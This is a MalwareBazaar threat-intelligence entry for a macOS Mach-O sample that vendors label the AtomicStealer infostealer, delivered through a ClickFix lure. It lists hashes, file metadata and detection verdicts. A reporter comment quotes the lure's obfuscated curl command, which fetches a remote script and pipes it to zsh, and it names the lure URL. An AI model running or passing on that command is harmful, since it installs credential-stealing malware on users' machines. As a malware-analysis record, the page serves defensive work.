MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8e9dd132e044d2d44ef09c4bcce1ab64f089100a7c6414c9b8d0c95c57cabcd0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments

SHA256 hash: 8e9dd132e044d2d44ef09c4bcce1ab64f089100a7c6414c9b8d0c95c57cabcd0
SHA3-384 hash: fff4810bed41498822f8c9fdd1daaf2d61f33d7a5994db367069f222b13fa9e81150638d425bd1ca854face34f57d3ad
SHA1 hash: 852b332a456ca81da9a03a9ef7046370d6759e8a
MD5 hash: 083ccc0d4fe17c01a58098d5d402bdd6
humanhash: gee-minnesota-oranges-aspen
File name:update
Download: download sample
File size:4'186'528 bytes
First seen:2026-05-24 07:17:34 UTC
Last seen:Never
File type:php macho
MIME type:application/x-mach-binary
ssdeep 98304:6v+Lxv0F8YBEbAbkdx6bbRxX9QZRvv74vQLxv0F8YBEbAbkdVqHbRZX9wZRvvT:Y+LxnY+bAgduR2Rb6QLxnY+bAgdOR+Rz
TLSH T11A1623E8E0BF27D7E9631EFE8A59A6B4E40D21359D1C6032E13DC3B6AC920455E78D13
TrID 82.2% (.DYLIB) Mac OS X Mach-O universal Dynamically linked shared Library (32500/1/5)
17.7% (.O/DYLIB/BUNDLE) Mac OS X Universal Binary (generic) (7002/2)
Magika macho
Reporter b0gdanw
Tags:ClickFix machO macOS OSX


Avatar
b0gdanw
The payload from ClickFix "Download for macOS — DMG or via bash" https://flylnk.xyz/?go=3vyu3ncq
curl -s $(echo "aHR0cHM6Ly9vcmJpdHN0cmlkZTcuY29tL2N1cmwvZWU0NTZhZGExOWE2MGE3NGFlMTkwMTBmMGQ0NjA3NWU2MzA2MjM1ZGY4Yjg1Y2JjMWZhMDZiMTk4MTA3NzkyNg==" | openssl base64 -d -A) | zsh

Intelligence


File Origin
# of uploads :
1
# of downloads :
242
Origin country :
US US
Vendor Threat Intelligence
No detections
Verdict:
Malicious
File Type:
macho fat
First seen:
2026-05-25T13:51:00Z UTC
Last seen:
2026-05-26T01:30:00Z UTC
Hits:
~10
Score:
99%
Verdict:
Malware
File Type:
Mach-O universal binary
Threat name:
MacOS.Trojan.Multiverze
Status:
Malicious
First seen:
2026-05-24 07:19:19 UTC
File Type:
Binary (Archive)
Extracted files:
2
AV detection:
12 of 38 (31.58%)
Threat level:
  5/5
Malware family:
AtomicStealer
Verdict:
Malicious
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

  
Delivery method
Other

Comments